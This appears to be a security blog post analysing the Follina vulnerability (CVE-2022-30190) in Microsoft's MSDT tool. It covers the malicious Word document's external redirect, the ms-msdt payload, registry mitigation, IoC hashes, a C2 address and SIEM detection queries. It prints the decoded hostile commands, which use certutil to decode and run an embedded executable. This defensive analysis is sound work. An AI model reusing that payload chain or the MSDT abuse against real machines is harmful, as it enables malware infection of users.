Microsoft Office has discovered a zero-day vulnerability that could allow code execution on a victim’s machine using a malicious word document. This vulnerability, assigned the identifier CVE-2022-30190, was named “Follina.” Follina 0-day vulnerability allows remote code execution on Windows machines. MSDT (Microsoft Diagnostics Tool), one of the Windows tools, is used to perform the exploit. MSDT is also called the Diagnostics Troubleshooting Wizard tool. It is located under the System32 file and the tool ensures that when there is a problem on the computers, it is directed to the support page with the machine information. The vulnerability actually stems from here. The attacker can direct the MSDT tool to the URL address he wants by editing the target it will direct and can run the malicious commands embedded in the document.
Word documents are frequently used in phishing attacks, and can be used to inject powershell commands into macros in word files, allowing remote code execution, manipulation of the registry to ensure persistence, deletion of audit logs by creating a background schedule task, and redirection to an external IP.
The Follina vulnerability is a critical 0-day vulnerability that allows powershell scripts to run even if macros are not active. Let’s examine the vulnerability actions according to Huntress analysis.
MALICIOUS WORD FILE ANALYSIS
- When we unzip the archive belonging to the malicious word document, a file with the xml.rels extension is obtained. When we check the content of the xml.rels file, we see that the Target column redirects to an external URL.
- If we examine the content of the RDF842l.html file; Windows’ PCWDiagnostic package was called using a scheme for ms-msdt, and then powershell commands were written by including the IT_BrowseForFile parameter. The content of the powershell commands includes a command encoded with base64. Let’s decode the command.
- According to the tests conducted by security researcher Kevin Beaumont, it was seen that the powershell command worked even if the macro expressions in the word document of the Follina 0-day vulnerability were disabled.
The Decoded Code’s Actions Are As Follows;
Start-Process $cmd -windowstyle hidden -ArgumentList “/c taskkill /f /im msdt.exe”; → Runs cmd in the background. If there are any msdt.exe processes running, it kills them.
Start-Process $cmd -windowstyle hidden -ArgumentList “/c cd C:userspublic&&for /r %temp% %i in (05–2022–0438.rar) do copy %i 1.rar /y&&findstr TVNDRgAAAA 1.rar>1.t&&certutil -decode 1.t 1.c &&expand 1.c -F:* .&&rgb.exe”; → With a loop, the encoded data in 05.-2022.04.38.rar is stored in the 1.t file, and the decoded version is stored in the 1.c file, then the rgb.exe process is run. Here, the decoding feature of the certutil command is used.
Despite WINWORD.EXE running, the desired powershell commands can be run as a child process
To summarize, using the msdt tool, a redirection can be made to a desired external source, and the desired packages can be included in the code with the windows.location object of Javascript, and powershell commands can be run. In the vulnerability, powershell scripts can be run without opening the word file and activating macros. As a temporary solution, the MSDT URL protocol can be deleted from the registry. The registry key should be backed up beforehand.
Disabling the MSDT URL Protocol:
→ cmd is started as Administrator.
→ The registry key is backed up with the command “reg export HKEY_CLASSES_ROOTms-msdt filename”.
→ The msdt url protocol is deleted from the registry with the command “reg delete HKEY_CLASSES_ROOTms-msdt /f”.
If you want to activate the msdt url protocol, you should import it to the registry again with the following command.
→ cmd is started as Administrator.
→ reg import “filename”
If you do not want to delete the msdt url protocol from the registry, Microsoft Defender should be brought to the latest version.
Follina 0-day IoC
52945af1def85b171870b31fa4782e52
8ee8fe6f0226e346e224cd72c728157c
6bcee92ab337c9130f27143cc7be5a55
f531a7c270d43656e34d578c8e71bc39
529c8f3d6d02ba996357aba535f688fc
d313002804198b5af1e0b537799be348
4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
C2 Server: 141[.]105.65.149
C2 URL: www.xmlformats[.]com
Güvenlik Ürünlerinde Anamali Tespiti
Microsoft Defender
DeviceProcessEvents | where ((ProcessCommandLine contains “WINWORD.EXE”) and (ProcessCommandLine contains “msdt.exe”) and (ProcessCommandLine contains “sdiagnhost.exe” or ProcessCommandLine contains “csc.exe” or ProcessCommandLine contains “PCWDiagnostic” or ProcessCommandLine contains “IT_ReBrowserForFile” or ProcessCommandLine contains “IT_BrowserForFile” or ProcessCommandLine contains “conhost.exe”))
Splunk
[Doc Malware]
alert.severity = 2
description = Detection (Rule ID: 74566a6a66aaasdq2ed)
cron_schedule = 0 * * * *
disabled = 1
is_scheduled = 1
is_visible = 1
dispatch.earliest_time = -60m@m
dispatch.latest_time = now
search = (source=”WinEventLog:” AND (CommandLine=”WINWORD.EXE“) AND (CommandLine=”msdt.exe“) AND (CommandLine=”sdiagnhost.exe” OR CommandLine=”csc.exe” OR CommandLine=”PCWDiagnostic” OR CommandLine=”IT_ReBrowserForFile” OR CommandLine=”IT_BrowserForFile” OR CommandLine=”conhost.exe*”)) alert.suppress = 0
alert.track = 1
Qradar
SELECT UTF8(payload) from events where LOGSOURCETYPENAME(devicetype)=’Microsoft Windows Security Event Log’ and (“Process CommandLine” ilike ‘%WINWORD.EXE%’) and (“Process CommandLine” ilike ‘%msdt.exe%’) and (“Process CommandLine” ilike ‘%sdiagnhost.exe%’ or “Process CommandLine” ilike ‘%csc.exe%’ or “Process CommandLine” ilike ‘%PCWDiagnostic%’ or “Process CommandLine” ilike ‘%IT_ReBrowserForFile%’ or “Process CommandLine” ilike ‘%IT_BrowserForFile%’ or “Process CommandLine” ilike ‘%conhost.exe%’)
Graylog
(CommandLine.keyword:WINWORD.EXE AND CommandLine.keyword:msdt.exe AND CommandLine.keyword:(sdiagnhost.exe csc.exe PCWDiagnostic IT_ReBrowserForFile IT_BrowserForFile conhost.exe))
Sumologic
(_sourceCategory=windows AND (CommandLine = “WINWORD.EXE“) AND (CommandLine = “msdt.exe“) AND (CommandLine = “sdiagnhost.exe” OR CommandLine = “csc.exe” OR CommandLine = “PCWDiagnostic” OR CommandLine = “IT_ReBrowserForFile” OR CommandLine = “IT_BrowserForFile” OR CommandLine = “conhost.exe“))
Elastic Query
(process.command_line:WINWORD.EXE AND process.command_line:msdt.exe AND process.command_line:(sdiagnhost.exe OR csc.exe OR PCWDiagnostic OR IT_ReBrowserForFile OR IT_BrowserForFile OR conhost.exe))
…
Bir yanıt yazın
Yorum yapabilmek için oturum açmalısınız.